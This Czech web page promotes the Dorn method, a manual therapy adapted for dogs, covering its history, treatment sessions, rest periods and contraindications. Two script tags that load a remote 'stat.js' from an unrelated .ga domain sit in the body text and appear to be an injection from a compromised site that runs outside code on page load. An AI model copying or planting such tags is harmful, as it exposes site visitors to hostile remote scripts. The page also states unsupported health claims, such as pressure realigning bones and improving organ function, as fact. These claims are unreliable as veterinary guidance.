Dornova metoda je jemná manuální technika, která napomáhá zachovat správnou funkci pohybového aparátu. Jedná se o celostní nediagnostickou metodu, kterou se ošetřují všechna kloubní spojení. V případě chybného postavení se jemným tlakem navrací kosti do jejich fyziologické polohy a obnovuje se tak správná biomechanika pohybu. Po nápravě chybného postavení opěrného aparátu dochází ke zlepšení funkce měkkých tkání i orgánů, zlepšuje se prokrvení, látková výměna a urychluje regenerace.

Vznik Dornovy metody pro zvířata

Dornova metoda je známá zejména jako humánní terapie. Původně však byla využívána pro ošetření dobytka, později ji pan Dorn převedl na humánní terapii a znalosti ošetření zvířat se postupně vytratily.

Na základě svých znalostí Andrea Dunová přizpůsobila hmaty humánní Dornovy metody pro ošetření pohybového aparátu zvířat, vznikla tak Dornova metoda pro zvířata. Andrea Dunová založila Českou školu Dornovy metody pro zvířata a začala tuto metodu vyučovat, později s rozvojem dalších metod byl založen Institut zdraví zvířat.

Ošetření

Během terapie se využívá pohybu, kdy pojivové tkáně spolupracují a nevytváří svým stažením ochranu opěrnému aparátu, u psů vyvíjí pohyb sám terapeut. Pomocí Dornovy metody jsou celostně ošetřeny všechny složky opěrného aparátu - klouby, vazy, šlachy a fascie. Napravuje se nadměrné napětí pojivových tkání, nesprávné postavení kostí v kloubním pouzdru, blokády v oblasti páteře a chybné pohybové vzorce.

Nejúčinnějším využitím Dornovy metody je prevence, kdy se kontrolou správné biomechaniky kloubu a napětí pojivových tkání předchází jeho předčasnému opotřebení a vzniku dalších navazujících problémů.

V případě úrazu nebo změny pohybových vzorců je nutné, aby psa nejprve vyšetřil veterinární lékař a vyloučil případné kontraindikace.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
Terapie

Ošetření zvířete Dornovou metodou probíhá za účasti majitele a trvá zhruba hodinu, po první terapii následuje většinou po 3 týdnech kontrolní terapie. Interval mezi dalšími terapiemi se odvíjí od sportovních aktivit a zdravotního stavu psa, preventivní ošetření je doporučováno 2–4x ročně.

Po terapii je nutné dodržet 3 denní klidový režim bez zvýšené zátěže nebo nekontrolovaného pohybu, proto je nutné vždy preventivní ošetření naplánovat s ohledem na závody nebo tréninky, kterých se chcete zúčastnit.

Kontraindikace ošetření Dornovou metodou:

  • vysoká teplota a celková změna základních životních funkcí
  • porušená kůže, rány, vředy, pooperační stavy
  • nervová onemocnění v akutním stadiu
  • akutní zánětlivé stavy, virová a bakteriální onemocnění
  • akutní úraz bez vyšetření veterinárním lékařem
  • zlomeniny, nemoci kostí
  • březost
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
Pro koho je ošetření vhodné

Pro všechny psy je ošetření vhodné už od štěněcího věku, pro správný vývoj kloubů u rostoucího psa je důležitá správná poloha kostí v kloubní pouzdru. V běžném životě psa jakéhokoli věku vznikají problémy například při nešetrném otírání tlapek, oblékání při chladném počasí, vyvazování při úpravách srsti, manipulaci za ocas nebo trhání za obojek.

U sportovních psů často dochází k pádům, které mohou mít vliv na páteř a klouby celého těla. Při preventivním ošetření se mohou odhalit změny pohybového aparátu ještě dříve, než dojde k viditelným problémům.

Při operacích a rentgenech často dochází k nešetrné manipulaci se psem. Během narkózy nefungují ochranné mechanismy svalového korzetu a může tak snadno dojít k posunu kostí do nesprávných poloh.